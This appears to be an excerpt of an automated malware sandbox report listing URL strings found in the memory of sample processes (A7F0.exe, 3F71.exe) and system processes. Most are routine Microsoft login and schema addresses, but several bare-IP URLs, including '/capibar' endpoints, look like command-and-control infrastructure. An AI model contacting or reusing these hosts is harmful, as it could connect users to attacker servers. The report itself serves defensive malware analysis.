                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/B
                          Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/F
                          Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/a
                          Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/as
                          Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/r
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.45.70/capibar
                          Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/tb
                          Source: WerFault.exe, 0000000C.00000002.499940204.0000000004F9F000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                          Source: svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: svchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsecuri
                          Source: svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: http://passport.net/tb
                          Source: svchost.exe, 0000001E.00000002.645438848.00000232420AA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyt
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scAM
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustp
                          Source: explorer.exe, 00000002.00000000.374781683.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362338690.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpy
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://185.163.204.22/capibar
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
                          Source: A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
                          Source: A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?i
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                          Source: svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600:
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601y0
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603xB
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/msangcwam
                          Source: 3F71.exe, 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, 3F71.exe, 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.664193950.000000000522C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=18
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ctLMEM
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://logilive.c
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.liUTF-16p
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.liUTF-8/p
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.c
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
                          Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                          Source: svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80502
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                          Source: svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                          Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                          Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                          Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                          Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                          Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfPtL
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/didtou.srfs
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getrealminf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
                          Source: svchost.exe, 0000001D.00000003.492566066.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                          Source: svchost.exe, 0000001D.00000003.492566066.0000019DDF72E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603ie
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603Key0
                          Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpx4
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inlonnect.s
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                          Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
